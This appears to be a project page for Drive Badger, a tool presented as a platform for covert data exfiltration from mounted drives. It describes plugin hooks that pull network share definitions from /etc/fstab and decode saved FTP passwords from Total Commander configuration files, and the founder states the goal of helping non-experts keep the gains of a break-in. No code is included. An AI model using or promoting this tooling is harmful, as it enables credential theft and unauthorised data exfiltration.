Drive Badger: open source platform for covert data exfiltration operations, ranging from small computers to big servers.

Each partition recognized by Drive Badger during attack, between mount and rsync, is passed through series of hooks. Hooks are functional plugins, cloned into /opt/drivebadger/hooks directory, processing given filesystem in some more intelligent way, than just copying all data.

Available hooks

  • hook-fstab - look for /etc/fstab files, extract all statically defined smbfs/cifs and nfs shares and exfiltrate them
  • hook-wcxftp - look for Total Commander's wcx_ftp.ini files with saved FTP passwords, extract and decode passwords, and exfiltrate FTP accounts

Writing new hooks

You can implement your own hooks. Each hook repository must contain script, accepting 2 arguments:

  • source path (where the partition is mounted)
  • target root directory (where the exfiltrated data should be written)

From the founder...

Being in IT security business for almost 25 years, I realized, that breaking protections (or preventing it) is becoming less and less important. We are not living in Outlook Express times anymore...
The key point is the ability to keep the privileges permanent, once obtained. This becomes more and more difficult, as IT systems get more and more complicated - and this is exactly the goal of Drive Badger project: to give non-ITSEC people the ability to keep either the privileges, or the outcome of the successful break-in.